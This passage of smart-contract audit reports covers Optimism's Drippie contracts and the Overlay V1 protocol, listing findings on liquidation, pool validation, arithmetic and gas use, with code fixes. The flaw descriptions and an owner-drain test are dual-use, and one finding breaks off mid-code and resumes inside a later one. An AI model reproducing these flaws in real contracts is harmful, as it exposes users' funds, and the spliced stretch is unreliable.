When a drip is created via the create function, its status is initialized to PAUSED (equal to uint8(2)), and when it gets activated its status is changed to ACTIVE (equal to uint8(1)). So the status changes from 0 (NONE) to 2 (PAUSED) to 1 (ACTIVE). Recommendation: Consider switching the order of PAUSED and ACTIVE inside the enum DripStatus definition; this would make the state transitions cleaner and easier to understand. Optimism: The recommendation has been implemented in PR#3280. Spearbit: Fixed.

+5.4.14 _gas is Unneeded as Transactor.CALL and Transactor.DELEGATECALL Function Argument Severity: Informational Context: Transactor.sol#L30, Transactor.sol#L49 Description: The caller (i.e. the contract owner) can already control the desired amount of gas at the transaction level. Recommendation: Remove the _gas argument. Optimism: Addressed in PR#3280. Spearbit: Fixed.

+5.4.15 Licensing Conflict on Inherited Dependencies Severity: Informational Context: Drippie.sol#L1, AssetReceiver.sol#L1, Transactor.sol#L1 Description: Solmate contracts are AGPL-licensed, which is incompatible with the MIT license of the Drippie-related contracts. Recommendation: Strict interpretations of AGPL require inheriting contracts to be released under AGPL. Possible remediations include: • Altering the Drippie license • Removing the AGPL dependencies and using an alternate library Optimism: Solmate v7 is now MIT licensed. Spearbit: The Solmate v7 license has been updated to MIT. Note: The project has been audited with Solmate v6 (which has been audited) and not with Solmate v7 (which at the current time has not been audited).

+5.4.16 Rename Functions for Clarity Severity: Informational Context: Drippie.sol#L160 Description: status: The status(string memory _name, DripStatus _status) function allows the owner to update the status of a drip. The purpose of the function is not obvious from its name and could mislead a user into believing it is a view function that retrieves the status of a drip rather than one that mutates it. executable: The executable(string memory _name) public view returns (bool) function returns true if the drip with name _name can be executed. Recommendation: Consider changing status to setStatus/updateStatus. Consider changing executable to isExecutable.

+5.4.17 Owner Has Permission to Drain Value from Drippie Contract Severity: Informational Context: Scenario 1: Drippie.sol#L126 Scenario 2: Drippie.sol#L19 Scenario 3: Transactor.sol#L27-L34 Description: Consider the following scenarios. • Scenario 1: The owner may create arbitrary drips, including a drip that sends all funds to themselves. • Scenario 2: AssetReceiver permits the owner to withdraw ETH, ERC20 tokens, and ERC721 tokens. • Scenario 3: The owner may execute arbitrary calls. Transactor.CALL is a function that allows the owner of the contract to execute a "general purpose" low-level call:

function CALL(
    address _target,
    bytes memory _data,
    uint256 _gas,
    uint256 _value
) external payable onlyOwner returns (bool, bytes memory) {
    return _target.call{ gas: _gas, value: _value }(_data);
}

The function will transfer _value ETH from the contract balance to the _target address. The function is also payable, which means the owner can send funds along with the call. Test example showcasing the issue:

function test_transactorCALLAllowOwnerToDrainDrippieContract() public {
    bool success;
    vm.deal(deployer, 0 ether);
    vm.deal(bob, 0 ether);
    vm.deal(address(drippie), 1 ether);
    vm.prank(deployer);
    // send 1 ether via `call` to a contract that cannot receive them
    (success, ) = drippie.CALL{value: 0 ether}(bob, "", 100000, 1 ether);
    assertEq(success, true);
    assertEq(address(drippie).balance, 0 ether);
    assertEq(bob.balance, 1 ether);
}

Recommendation: These permissions appear intentional.
Be sure to document them for Drippie users and suggest they take any necessary precautions (multisigs, etc.). Consider whether arbitrary calls are necessary and, if not, remove AssetReceiver (and inherit directly from Owned). Arbitrary calls can already be made by the owner creating a new drip; think of arbitrary calls as "one shot drips", and setting a very large interval makes it easy to archive a one shot drip after use. What would be lost by removing AssetReceiver as a dependency is arbitrary state updates (from the delegatecall) and the onERC721Received hook we recommended adding to AssetReceiver in another ticket.

diff --git a/findings_newupdate/spearbit/Overlay-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Overlay-Spearbit-Security-Review.txt new file mode 100644 index 0000000..d342f42 --- /dev/null +++ b/findings_newupdate/spearbit/Overlay-Spearbit-Security-Review.txt @@ -0,0 +1,31 @@

+5.1.1 Use unchecked in TickMath.sol and FullMath.sol Severity: High Risk Context: Overlay TickMath, Euler TickMath, Overlay FullMath, Euler FullMath Description: The Uniswap math libraries rely on wrapping behaviour for conducting arithmetic operations. Solidity version 0.8.0 introduced checked arithmetic by default, where operations that cause an overflow revert. Since the code was adapted from Uniswap and originally written in Solidity version 0.7.6, these arithmetic operations should be wrapped in an unchecked block. Recommendation: Add an unchecked block to the following functions in TickMath.sol and FullMath.sol: • getSqrtRatioAtTick() • getTickAtSqrtRatio() • mulDiv() • mulDivRoundingUp() The Uniswap protocol has a reference implementation for these changes in a branch named 0.8. Overlay: Fixed in commit 1f6a974. Spearbit: Acknowledged.
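To illustrate the semantic difference (a minimal fragment of our own, not project code):

library WrappingMath {
    // Solidity 0.8.x reverts on overflow by default; unchecked restores the
    // 0.7.6 wrapping semantics that the Uniswap libraries depend on.
    function mulWrapping(uint256 a, uint256 b) internal pure returns (uint256) {
        unchecked {
            return a * b; // wraps modulo 2**256 instead of reverting
        }
    }
}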
+5.1.2 Liquidation might fail Severity: High Risk Context: OverlayV1Market.sol#L345-L376, Position.sol#L221-L247 Description: The liquidate() function checks whether a position can be liquidated via liquidatable(), which uses maintenanceMarginFraction as the factor to determine whether enough value is left. However, in the rest of the liquidate() function, liquidationFeeRate is used to determine the fee paid to the liquidator. Because two different measures are used for these calculations, it is not necessarily true that enough value is left to cover the fee, which means liquidation of such positions might fail. This is classified as high risk because liquidation is an essential piece of Overlay's functionality.

contract OverlayV1Market is IOverlayV1Market {
    function liquidate(address owner, uint256 positionId) external {
        ...
        require(pos.liquidatable(..., maintenanceMarginFraction), "OVLV1:!liquidatable");
        ...
        uint256 liquidationFee = value.mulDown(liquidationFeeRate);
        ...
        ovl.transfer(msg.sender, value - liquidationFee);
        ovl.transfer(IOverlayV1Factory(factory).feeRecipient(), liquidationFee);
    }
}

library Position {
    function liquidatable(..., uint256 maintenanceMarginFraction) ... {
        ...
        uint256 maintenanceMargin = posNotionalInitial.mulUp(maintenanceMarginFraction);
        can_ = val < maintenanceMargin;
    }
}

Recommendation: Also take liquidationFee into account when determining whether a position can/should be liquidated. Note: function build() also calls liquidatable(). Overlay: Agreed. The way the liquidation fee amount is calculated, it's taken from the remaining maintenance margin once the liquidate() function is called (less any burn of margin as insurance). So the liquidation fee in its current form is not a percentage of the current notionalWithPnl() like trading fees are, which means it won't affect the ability to liquidate the position. We should potentially change this. Fixed in commit 082c6c7. Spearbit: Acknowledged.

5.2 Medium Risk

+5.2.1 Rounding down of snapAccumulator might influence calculations Severity: Medium Risk Context: Roller.sol#L23-L78 Description: The function transform() lowers snapAccumulator with the following expression: (snapAccumulator * int256(dt)) / int256(snapWindow). As long as snapAccumulator * dt is smaller than snapWindow, this is rounded down to 0, which means snapAccumulator stays at the same value. Luckily, dt will eventually reach the value of snapWindow, and by then the value is no longer rounded down to 0. The risk lies in the calculations diverging from the formulas written in the whitepaper. Note: Given medium risk severity because the probability of this happening is high, while the impact is likely low.

function transform(...) ... {
    ...
    snapAccumulator -= (snapAccumulator * int256(dt)) / int256(snapWindow);
    ...
}

Recommendation: Confirm that the rounding down does not influence the calculations too much. Overlay: Confirmed and agreed. Fixed in commit 9b1865e. Spearbit: Acknowledged.
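As a worked example (values ours, for illustration): with snapAccumulator = 5, snapWindow = 600 and dt = 100, the decrement is (5 * 100) / 600, which truncates to 0, so snapAccumulator does not decay at all; only once dt reaches 120 does (5 * 120) / 600 = 1 start reducing it.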
+5.2.2 Verify pool legitimacy Severity: Medium Risk Context: OverlayV1UniswapV3Factory.sol#L19-L40, OverlayV1UniswapV3Feed.sol#L30-L78 Description: The constructors in OverlayV1UniswapV3Factory.sol and OverlayV1UniswapV3Feed.sol only do a partial check that the pool corresponds to the supplied tokens. This is accomplished by calling the pool's functions, but if the pool were malicious it could return any token. Additionally, the checks can be bypassed by supplying the same token twice. Because the deployFeed() function is permissionless, it is possible to deploy malicious feeds. Luckily, the deployMarket() function is permissioned and prevents malicious markets from being deployed.

contract OverlayV1UniswapV3Factory is IOverlayV1UniswapV3FeedFactory, OverlayV1FeedFactory {
    constructor(address _ovlWethPool, address _ovl, ...) {
        ovlWethPool = _ovlWethPool; // no check on validity of _ovlWethPool here
        ovl = _ovl;
    }

    function deployFeed(address marketPool, address marketBaseToken, address marketQuoteToken, ...)
        external returns (address feed_) { // Permissionless
        ...
        // no check on validity of marketPool here
    }
}

contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed {
    constructor(
        address _marketPool,
        address _ovlWethPool,
        address _ovl,
        address _marketBaseToken,
        address _marketQuoteToken,
        ...
    ) ... {
        ...
        address _marketToken0 = IUniswapV3Pool(_marketPool).token0(); // relies on a valid _marketPool
        address _marketToken1 = IUniswapV3Pool(_marketPool).token1();
        require(_marketToken0 == WETH || _marketToken1 == WETH, "OVLV1Feed: marketToken != WETH");
        marketToken0 = _marketToken0;
        marketToken1 = _marketToken1;
        require(
            _marketToken0 == _marketBaseToken || _marketToken1 == _marketBaseToken,
            "OVLV1Feed: marketToken != marketBaseToken"
        );
        require(
            _marketToken0 == _marketQuoteToken || _marketToken1 == _marketQuoteToken,
            "OVLV1Feed: marketToken != marketQuoteToken"
        );
        marketBaseToken = _marketBaseToken; // what if _marketBaseToken == _marketQuoteToken == WETH ?
        marketQuoteToken = _marketQuoteToken;
        marketBaseAmount = _marketBaseAmount;

        // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL
        address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); // relies on a valid _ovlWethPool
        address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1();
        require(
            _ovlWethToken0 == WETH || _ovlWethToken1 == WETH,
            "OVLV1Feed: ovlWethToken != WETH"
        );
        require(
            _ovlWethToken0 == _ovl || _ovlWethToken1 == _ovl, // What if _ovl == WETH ?
            "OVLV1Feed: ovlWethToken != OVL"
        );
        ovlWethToken0 = _ovlWethToken0;
        ovlWethToken1 = _ovlWethToken1;
        marketPool = _marketPool;
        ovlWethPool = _ovlWethPool;
        ovl = _ovl;
    }

Recommendation: Verify that the pools are indeed Uniswap pools and that the supplied tokens do generate the supplied pool. Note: Verifying that a legitimate Uniswap pool is used still allows for the possibility of malicious tokens making it into the pool. Consider changing the deployFeed() function to be permissioned, the same way deployMarket() is. When deploying a market via deployMarket(), make sure only valid feeds and tokens are used. Consider checking the pools using the example code below, and note that: • This can be done for both the marketPool and the _ovlWethPool. • Determine where to do this: in OverlayV1UniswapV3Factory and/or OverlayV1UniswapV3Feed. • This way the pool address doesn't even have to be supplied. • You have to supply a fee to getPool(); it seems only 3 fees are used.

IUniswapV3Factory constant UniswapV3Factory =
    IUniswapV3Factory(address(0x1F98431c8aD98523631AE4a59f267346ea31F984));
uint24[3] memory FeeAmount = [uint24(500), uint24(3000), uint24(10000)];
for (uint i = 0; i <
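The loop above is truncated in this text. A hedged reconstruction of the check it sketches, assuming the canonical mainnet factory and the getPool(tokenA, tokenB, fee) getter of IUniswapV3Factory:

interface IUniswapV3Factory {
    function getPool(address tokenA, address tokenB, uint24 fee) external view returns (address);
}

// Canonical Uniswap V3 factory on mainnet (also quoted in the report above).
IUniswapV3Factory constant UNISWAP_V3_FACTORY =
    IUniswapV3Factory(0x1F98431c8aD98523631AE4a59f267346ea31F984);

// Returns true iff the factory itself reports `pool` as the pool for the
// token pair at one of the three standard fee tiers.
function isUniswapV3Pool(address pool, address tokenA, address tokenB) view returns (bool) {
    uint24[3] memory feeAmounts = [uint24(500), uint24(3000), uint24(10000)];
    for (uint256 i = 0; i < feeAmounts.length; i++) {
        if (UNISWAP_V3_FACTORY.getPool(tokenA, tokenB, feeAmounts[i]) == pool) {
            return true;
        }
    }
    return false;
}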
2**32).

function transform(..., uint256 timestamp, ...) ... {
    uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32
    ...
    uint256 dt = uint256(timestamp32 - self.timestamp); // could revert if timestamp32 has just wrapped
    ...
}

Recommendation: Note that this truncation would only occur in year 2107, and most protocols ignore this issue. However, a potential fix would look as follows:

uint256 dt;
if (timestamp32 < self.timestamp) {
    dt = uint256(2**32) + uint256(timestamp32) - uint256(self.timestamp);
} else {
    dt = uint256(timestamp32 - self.timestamp);
}

Overlay: Fixed in 7fe8ff3. Spearbit: Acknowledged.

+5.3.4 Verify the validity of _microWindow and _macroWindow Severity: Low Risk Context: OverlayV1Feed.sol#L13-L16 Description: The constructor of OverlayV1Feed doesn't verify the validity of _microWindow and _macroWindow, potentially causing the price oracle to produce bad results if misconfigured.

constructor(uint256 _microWindow, uint256 _macroWindow) {
    microWindow = _microWindow;
    macroWindow = _macroWindow;
}

Recommendation: Consider adding sanity checks to be safe. Note: Checks in constructors are a one-time cost, therefore the gas overhead is usually acceptable. Consider introducing the following checks: 1. microWindow > 0 2. macroWindow > microWindow 3. macroWindow / microWindow > some constant bound (from the test cases, this is 60) 4. macroWindow < 1 day, or a similar bound. Overlay: Fixed in commit 44b419c, except for the 3rd recommendation. Spearbit: Acknowledged.

+5.3.5 Simplify _midFromFeed() Severity: Low Risk Context: OverlayV1Market.sol#L653-L657 Description: The calculation in _midFromFeed() is more complicated than necessary because min(x,y) + max(x,y) == x + y. More importantly, the average operation (bid + ask) / 2 can overflow and revert if bid + ask >= 2**256.

function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) {
    uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow);
    uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow);
    mid_ = (bid + ask) / 2;
}

Recommendation: Change the code as follows:

 function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) {
-    uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow);
-    uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow);
-    mid_ = (bid + ask) / 2;
+    mid_ = Math.average(data.priceOverMicroWindow, data.priceOverMacroWindow);
 }

Here, the average function is from OpenZeppelin. Overlay: Fixed in commit 2bb5654. Spearbit: Acknowledged.
5.4 Gas Optimization

+5.4.1 Use implicit truncation of timestamp Severity: Gas Optimization Context: Roller.sol#L29 Description: Solidity truncates data when it is typecast to a smaller data type (see the Solidity documentation on explicit conversions). This can be used to simplify the following statement:

uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32

Recommendation: Change the code as follows:

- uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32
+ uint32 timestamp32 = uint32(timestamp); // truncated by compiler

Overlay: Fixed in commit 08ef243. Spearbit: Acknowledged.

+5.4.2 Set pos.entryPrice to 0 after liquidation Severity: Gas Optimization Context: OverlayV1Market.sol#L345-L427 Description: The liquidate() function sets most of the values of pos to 0, with the exception of pos.entryPrice.

function liquidate(address owner, uint256 positionId) external {
    ...
    // store the updated position info data. mark as liquidated
    pos.notional = 0;
    pos.debt = 0;
    pos.oiShares = 0;
    pos.liquidated = true;
    positions.set(owner, positionId, pos);
    ...
}

Recommendation: Consider setting pos.entryPrice to 0. This is more in line with the rest of the code and can give a small gas refund. Overlay: Fixed in commit 55318f5. Spearbit: Acknowledged.

+5.4.3 Store result of expression in temporary variable Severity: Gas Optimization Context: OverlayV1Market.sol#L145-L221, OverlayV1Market.sol#L240-L342, OverlayV1Market.sol#L488-L534 Description: Several gas optimizations are possible by storing the result of an expression in a temporary variable, such as the value of oiFromNotional(data, capNotionalAdjusted).

function build( ... ) {
    ...
    uint256 price = isLong
        ? ask(data, _registerVolumeAsk(data, oi, oiFromNotional(data, capNotionalAdjusted)))
        : bid(data, _registerVolumeBid(data, oi, oiFromNotional(data, capNotionalAdjusted)));
    ...
    require(oiTotalOnSide <= oiFromNotional(data, capNotionalAdjusted), "OVLV1:oi>cap");
}

• A: The value of pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) could be stored in a temporary variable to save gas. • B: The value of oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) could also be stored in a temporary variable to save gas and make the code more readable. • C: The value of pos.oiSharesCurrent(fraction) could be stored in a temporary variable to save gas.

function unwind(...) ... {
    ...
    uint256 price = pos.isLong
        ? bid(
            data,
            _registerVolumeBid(
                data,
                pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A1
                oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B1
            )
        )
        : ask(
            data,
            _registerVolumeAsk(
                data,
                pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A2
                oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B2
            )
        );
    ...
    if (pos.isLong) {
        oiLong -= Math.min(
            oiLong,
            pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A3
        );
        oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); // C1
    } else {
        oiShort -= Math.min(
            oiShort,
            pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A4
        );
        oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); // C2
    }
    ...
    pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); // C3
}

The value of 2 * k * timeElapsed could also be stored in a temporary variable:

function oiAfterFunding( ...) ... {
    ...
    if (2 * k * timeElapsed < MAX_NATURAL_EXPONENT) {
        fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed);
    }
}

Recommendation: Consider using temporary variables to save gas and improve readability. Overlay: Fixed in commit 0af31ff for oiFromNotional(), i.e. B. Recommendations A and C cause some stack-too-deep issues, so they haven't been implemented yet. Spearbit: Acknowledged.

+5.4.4 Flatten code of OverlayV1UniswapV3Feed Severity: Gas Optimization Context: OverlayV1UniswapV3Feed.sol#L84-L282 Description: The functions _fetch(), _inputsToConsultMarketPool(), _inputsToConsultOvlWethPool() and consult() do a lot of interactions with small arrays and loops over them, increasing overhead and reading difficulty. Recommendation: Consider making the code less generic and unrolling it. Note: If you don't unroll, the for loops over arrays can be made more efficient by caching the array length; however, as the loops are very small, it may not be worth the trouble. Overlay: The Overlay team is also working on potentially flattening this in the Balancer feed implementation. The function _fetch was flattened in commit bce944f. Spearbit: Acknowledged.

+5.4.5 Replace memory with calldata Severity: Gas Optimization Context: OverlayV1Deployer.sol#L21-L25, OverlayV1Market.sol#L102-L107 Description: External calls to functions with memory parameters can be made more gas efficient by replacing memory with calldata, as long as the memory parameters are not modified. Recommendation: Consider replacing memory with calldata and check that the gas costs are indeed lower. Note: Also check with the finding "Put risk parameters in an array".

 contract OverlayV1Deployer is IOverlayV1Deployer {
-    function deploy(..., Risk.Params memory params) .. {
+    function deploy(..., Risk.Params calldata params) .. {

Overlay: Fixed in commit 6e96fa5. Spearbit: Acknowledged.
+5.4.6 No need to cache immutable values Severity: Gas Optimization Context: OverlayV1UniswapV3Feed.sol#L84-L87, OverlayV1Feed.sol#L13-L16 Description: The variables microWindow and macroWindow are immutable, so it is not necessary to cache them because the compiler inlines their values.

contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed {
    function _fetch() internal view virtual override returns (Oracle.Data memory) {
        // cache micro and macro windows for gas savings
        uint256 _microWindow = microWindow;
        uint256 _macroWindow = macroWindow;
        ...
    }
}

abstract contract OverlayV1Feed is IOverlayV1Feed {
    ...
    uint256 public immutable microWindow;
    uint256 public immutable macroWindow;
    ...
    constructor(uint256 _microWindow, uint256 _macroWindow) {
        microWindow = _microWindow;
        macroWindow = _macroWindow;
    }
}

Recommendation: Use microWindow and macroWindow directly in function _fetch(). Overlay: Fixed in commit ef5d0d3. Spearbit: Acknowledged.

+5.4.7 Simplify circuitBreaker Severity: Gas Optimization Context: OverlayV1Market.sol#L558-L574 Description: The function circuitBreaker() does a divDown() which can be avoided to save gas and improve readability.

function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... {
    ...
    if (minted <= int256(_circuitBreakerMintTarget)) {
        return cap;
    } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) {
        return 0;
    }
    ...
}

Recommendation: Consider changing the circuitBreaker() function as follows:

 function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... {
     ...
     if (minted <= int256(_circuitBreakerMintTarget)) {
         return cap;
-    } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) {
+    } else if (minted >= 2 * int256(_circuitBreakerMintTarget)) { // more like the 'if' above
         return 0;
     }
     ...
 }

Overlay: We had added the divDown in the else clause to match the following, in the event of a rounding issue that caused adjustment to be negative:

uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget);

But seeing here that divDown (vs divUp) means adjustment would always be >= 0, this is confirmed and agreed. Fixed in commit 3ce32d9. Spearbit: Acknowledged.
+5.4.8 Optimizations if data.macroWindow is constant Severity: Gas Optimization Context: OverlayV1Market.sol#L578-L606, OverlayV1Market.sol#L465-L484 Description: Several checks in contract OverlayV1Market involve data.macroWindow in combination with a linear calculation. If data.macroWindow does not change (as is the case with the UniswapV3 feed), it is possible to optimize the calculations by precalculating several values. Recommendation: In the constructor of contract OverlayV1Market.sol, calculate the following (please double-check the calculations):

frontbackrunbound = Math.min(
    params.lmbda,
    params.delta * data.macroWindow * 2 / AVERAGE_BLOCK_TIME
);

Also update frontbackrunbound when lmbda or delta are changed. Then update capNotionalAdjustedForBounds() to:

 function capNotionalAdjustedForBounds(Oracle.Data memory data, uint256 cap) public view returns (uint256) {
     ...
-    cap = Math.min(cap, frontRunBound(data));
-    cap = Math.min(cap, backRunBound(data));
+    cap = Math.min(cap, frontbackrunbound * data.reserveOverMicroWindow);
     ...
 }

-function frontRunBound(Oracle.Data memory data) public view returns (uint256) {
-    return lmbda.mulDown(data.reserveOverMicroWindow);
-}
-function backRunBound(Oracle.Data memory data) public view returns (uint256) {
-    uint256 window = (data.macroWindow * ONE) / AVERAGE_BLOCK_TIME;
-    return delta.mulDown(data.reserveOverMicroWindow).mulDown(window).mulDown(2 * ONE);
-}

In the constructor of contract OverlayV1Market.sol, calculate the following:

uint256 pow = params.priceDriftUpperLimit * data.macroWindow;
dpLowerLimit = INVERSE_EULER.powUp(pow);
dpUpperLimit = EULER.powUp(pow);

Also update dpLowerLimit and dpUpperLimit when priceDriftUpperLimit is changed.

 function dataIsValid(Oracle.Data memory data) public view returns (bool) {
     ...
-    uint256 pow = priceDriftUpperLimit * data.macroWindow;
-    uint256 dpLowerLimit = INVERSE_EULER.powUp(pow);
-    uint256 dpUpperLimit = EULER.powUp(pow);
     ...
     return (dp >= dpLowerLimit && dp <= dpUpperLimit);
 }

Note: Also see the finding "Optimize power functions" for additional optimizations. Overlay: Implemented the caching optimization for dpUpperLimit in commit c505175, but decided against caching frontbackrunbound since it's a bit easier to read the code alongside the whitepaper when frontRunBound() and backRunBound() remain separate functions. Spearbit: Acknowledged.

+5.4.9 Remove unused / redundant functions and variables Severity: Gas Optimization Context: OverlayV1Market.sol#L536-L539, OverlayV1Market.sol#L642-L649, Position.sol#L79-L90, Position.sol#L251-L292, OverlayV1UniswapV3Feed.sol#L30-L78 Description: Functions nextPositionId() and mid() in OverlayV1Market.sol are not used internally and don't appear to be useful.

contract OverlayV1Market is IOverlayV1Market {
    function nextPositionId() external view returns (uint256) {
        return _totalPositions;
    }
    function mid(Oracle.Data memory data, uint256 volumeBid, uint256 volumeAsk) ... { ... }
}

The functions oiInitial() and oiSharesCurrent() in library Position.sol have the same implementation. The oiInitial() function does not seem useful, as it retrieves current positions and not initial ones.

library Position {
    /// @notice Computes the initial open interest of position when built ...
    function oiInitial(Info memory self, uint256 fraction) internal pure returns (uint256) {
        return _oiShares(self).mulUp(fraction);
    }
    /// @notice Computes the current shares of open interest position holds ...
    function oiSharesCurrent(Info memory self, uint256 fraction) internal pure returns (uint256) {
        return _oiShares(self).mulUp(fraction);
    }
}

The function liquidationPrice() in library Position.sol is not used by the contracts. Because its type is internal, it cannot be called from the outside either.

library Position {
    function liquidationPrice(... ) internal pure returns (uint256 liqPrice_) { ... }
}

The variables ovlWethToken0 and ovlWethToken1 are stored but no longer used.

constructor(..., address _ovlWethPool, ...) .. {
    ...
    // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL
    address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0();
    address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1();
    ...
    ovlWethToken0 = _ovlWethToken0;
    ovlWethToken1 = _ovlWethToken1;
    ...
}

Recommendation: Double-check the usefulness of the above-mentioned functions and variables. Remove them if not useful, or change them to become useful. Overlay: • nextPositionId() was for testing. • mid() has been replaced with _midFromFeed(). • oiInitial(): this is likely confusing. • ovlWethToken0 and ovlWethToken1: unnecessary since the feed contract stores and uses ovl and WETH. Removed mid(), nextPositionId() and liquidationPrice() in this commit. We will update ovlWethToken0 and ovlWethToken1 when addressing "Check pools" and "Flatten code of OverlayV1UniswapV3Feed". Spearbit: Acknowledged.
+5.4.10 Optimize power functions Severity: Gas Optimization Context: OverlayV1Market.sol#L465-L469, OverlayV1Market.sol#L504-L506, OverlayV1Market.sol#L621-L640 Description: In contract OverlayV1Market.sol, several power calculations are done with EULER / INVERSE_EULER as base, which can be optimized to save gas.

function dataIsValid(Oracle.Data memory data) public view returns (bool) {
    ...
    uint256 dpLowerLimit = INVERSE_EULER.powUp(pow);
    uint256 dpUpperLimit = EULER.powUp(pow);
    ...
}

Note: As the Overlay team confirmed, less precision might be sufficient for this calculation.

OverlayV1Market.sol: fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed);
OverlayV1Market.sol: bid_ = bid_.mulDown(INVERSE_EULER.powUp(pow));
OverlayV1Market.sol: ask_ = ask_.mulUp(EULER.powUp(pow));

Recommendation: Replace EULER.powUp(x) with x.expUp() and replace INVERSE_EULER.powDown(x) with ONE.divDown(x.expUp()), as (1/e)^x == exp(-x) == 1/exp(x). In function dataIsValid() an even further optimization is possible. Consider using alternative exp() functions if less precision is required. Note: Although this might not be worth the trouble, take into account the suggestions of the finding "Optimizations if data.macroWindow is constant".

 function dataIsValid(Oracle.Data memory data) public view returns (bool) {
     ...
-    uint256 dpLowerLimit = INVERSE_EULER.powUp(pow);
-    uint256 dpUpperLimit = EULER.powUp(pow);
+    uint256 dpUpperLimit = pow.expUp();
+    uint256 dpLowerLimit = ONE.divDown(dpUpperLimit);
     ...
 }

This requires access to the LogExpMath.exp() function. As this function is private, something like the following needs to be added to library FixedPoint.sol (please double-check the code):

library FixedPoint {
    function expUp(uint256 x) internal pure returns (uint256) {
        if (x == 0) return ONE;
        _require(x < 2**255, Errors.X_OUT_OF_BOUNDS);
        int256 x_int256 = int256(x);
        uint256 raw = uint256(LogExpMath.exp(x_int256));
        uint256 maxError = add(mulUp(raw, MAX_POW_RELATIVE_ERROR), 1);
        return add(raw, maxError);
    }
}

Note: The constants EULER and INVERSE_EULER could be rewritten in a more readable format, but they are no longer necessary with the above suggested changes.

OverlayV1Market.sol:
-uint256 internal constant EULER = 2718281828459045091;
+uint256 internal constant EULER = 2.718_281_828_459_045_091e18;
-uint256 internal constant INVERSE_EULER = 367879441171442334;
+uint256 internal constant INVERSE_EULER = 0.367_879_441_171_442_334e18;

Overlay: Fixed in commit 4b20c00f. Spearbit: Acknowledged.

+5.4.11 Redundant Math.min() Severity: Gas Optimization Context: OverlayV1Market.sol#L543-L574 Description: The function capNotionalAdjustedForCircuitBreaker() calculates circuitBreaker() and then does a Math.min(cap, ...) with the result. However, circuitBreaker() already returns a value that is <= cap, so the Math.min(...) call is unnecessary.

function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) {
    ...
    cap = Math.min(cap, circuitBreaker(snapshot, cap));
    return cap;
}

function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) public view returns (uint256) {
    ...
    if (minted <= int256(_circuitBreakerMintTarget)) {
        return cap;
    } else if (...) {
        return 0;
    }
    // so minted > _circuitBreakerMintTarget, thus minted / _circuitBreakerMintTarget > ONE
    ...
    uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget);
    // so adjustment <= ONE
    return cap.mulDown(adjustment); // so this is <= cap
}

Recommendation: Change capNotionalAdjustedForCircuitBreaker() as follows:

 function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) {
     ...
-    cap = Math.min(cap, circuitBreaker(snapshot, cap));
+    cap = circuitBreaker(snapshot, cap);
 }

Overlay: Fixed in commit 3fe9520. Spearbit: Acknowledged.
+5.4.12 Replace square with multiplication Severity: Gas Optimization Context: OverlayV1Market.sol#L515-L518 Description: The contract OverlayV1Market.sol contains the following expression several times: x.powDown(2 * ONE). This computes the square of x, which can also be calculated in a more gas-efficient way. The expression is used, for instance, in:

function oiAfterFunding(...) {
    ...
    uint256 underRoot = ONE -
        oiImbalanceBefore.divDown(oiTotalBefore).powDown(2 * ONE).mulDown(
            ONE - fundingFactor.powDown(2 * ONE)
        );
    ...
}

Recommendation: Replace x.powDown(2 * ONE) with mulDown(x, x). Alternatively, add this functionality to the FixedPoint.sol library like Balancer has done: Balancer FixedPoint.sol#L107-L117. Overlay: Fixed in commit ad4395d. Spearbit: Acknowledged.
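For concreteness, a helper in the FixedPoint style (a sketch of our own in the Balancer mold; the helper name is ours and mulDown is assumed to be the library's rounding-down fixed-point multiply, i.e. (a * b) / ONE):

library FixedPointSquare {
    uint256 internal constant ONE = 1e18;

    // Equivalent to mulDown(x, x), considerably cheaper than powDown(x, 2 * ONE).
    function square(uint256 x) internal pure returns (uint256) {
        return (x * x) / ONE;
    }
}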
